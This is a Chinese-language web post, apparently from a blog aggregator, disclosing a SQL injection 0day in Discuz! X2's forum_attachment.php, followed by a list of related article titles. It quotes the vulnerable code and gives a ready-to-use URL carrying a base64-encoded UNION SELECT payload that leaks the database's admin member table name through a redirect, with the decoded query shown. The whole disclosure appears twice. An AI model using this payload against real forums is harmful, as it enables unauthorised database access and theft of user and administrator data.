Discuz! X2 SQL注射漏洞 0day
@Discuz! X2 SQL注射漏洞 0day
檔案:source\module\forum\forum_attachment.php
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|',
base64_decode($_G['gp_aid']));
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table
('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach
['tid']);
}
變數aid 直接base64_decode 後傳入 SQL查詢,造成注射漏洞。。。
http://www.xxxx.net/forum.php?
mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tI
ElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FI
Gxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
轉向後網址
http://www.xxxx.net/forum.php?
mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member
暴出表名 pre_common_admincp_member
實際查詢為:
$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where
TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));
檔案:source\module\forum\forum_attachment.php
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|',
base64_decode($_G['gp_aid']));
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table
('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach
['tid']);
}
變數aid 直接base64_decode 後傳入 SQL查詢,造成注射漏洞。。。
http://www.xxxx.net/forum.php?
mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tI
ElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FI
Gxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
轉向後網址
http://www.xxxx.net/forum.php?
mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member
暴出表名 pre_common_admincp_member
實際查詢為:
$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where
TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));
相關文章
- SQL注射/SQL Injection漏洞SQL
- (轉)Discuz!X2.0SQL隱碼攻擊漏洞EXPSQL
- 菜鳥學習SQL注射(轉)SQL
- WinRAR(5.21)-0day漏洞-始末分析
- Fedora 和 Ubuntu 曝出0day漏洞Ubuntu
- discuz /faq.php SQL Injection VulPHPSQL
- Discuz X2站點URL靜態化(修改.htaccess檔案設定Rewrite規則)
- Discuz!X升級/轉換程式GETSHELL漏洞分析
- Discuz! X系列遠端程式碼執行漏洞分析
- ImageMagick爆0day漏洞全球伺服器遭殃伺服器
- 專訪黑客wordexp:哪些0day漏洞沒公開?黑客
- WEB漏洞——SQLWebSQL
- 網站漏洞修復案例之Discuz!3.4最新版本網站
- 不要隨便開啟Office文件,微軟又有高危0day漏洞微軟
- 谷歌詳細披露4個0day漏洞!已有黑客正在利用谷歌黑客
- 蘋果釋出安全更新,修復已被利用的0day漏洞蘋果
- 微軟10月累積更新,修復4個0day漏洞微軟
- 網站安全滲透測試服務之discuz漏洞挖掘與利用網站
- Firefox 0day 漏洞被用於攻擊 Coinbase 僱員Firefox
- 谷歌釋出安全更新,修復今年第十個0day漏洞谷歌
- ZDI研究人員披露四個Microsoft Exchange中的0day漏洞ROS
- 微軟三月補丁更新修復3個0day漏洞微軟
- 修復6個0day漏洞,微軟11月累積更新發布微軟
- MSSQL注射知識庫 v 1.0SQL
- Pandownload 開發者被捕;微軟修復 3 個 0day 漏洞;福特、大眾被曝網路安全漏洞微軟
- 攻擊者宣稱可利用 0day 漏洞完全控制 Android 手機Android
- Oracle WebLogic 曝 0day 漏洞,攻擊者可遠端執行命令OracleWeb
- 如何安裝discuz論壇,discuz安裝步驟
- Windows7RC版曝出首個0day漏洞可致電腦藍屏Windows
- 每日安全資訊:SandboxEscaper 又釋出了一個微軟 0day 危急漏洞微軟
- 攻擊不斷!QNAP 警告利用0day漏洞Deadbolt 勒索軟體攻擊
- 攻擊者正利用DrayTek路由器0day漏洞修改DNS設定路由器DNS
- 0day漏洞組合拳:詳細分析一款惡意PDF樣本
- “噩夢公式”危機重現 360助微軟狙擊新型Office 0day漏洞公式微軟
- Discuz!論壇搭建
- Discuz的安裝
- 微軟1月累積更新發布,修復6個0day、9個高危漏洞微軟
- 微軟補丁星期二:修復108個漏洞,含5個0day微軟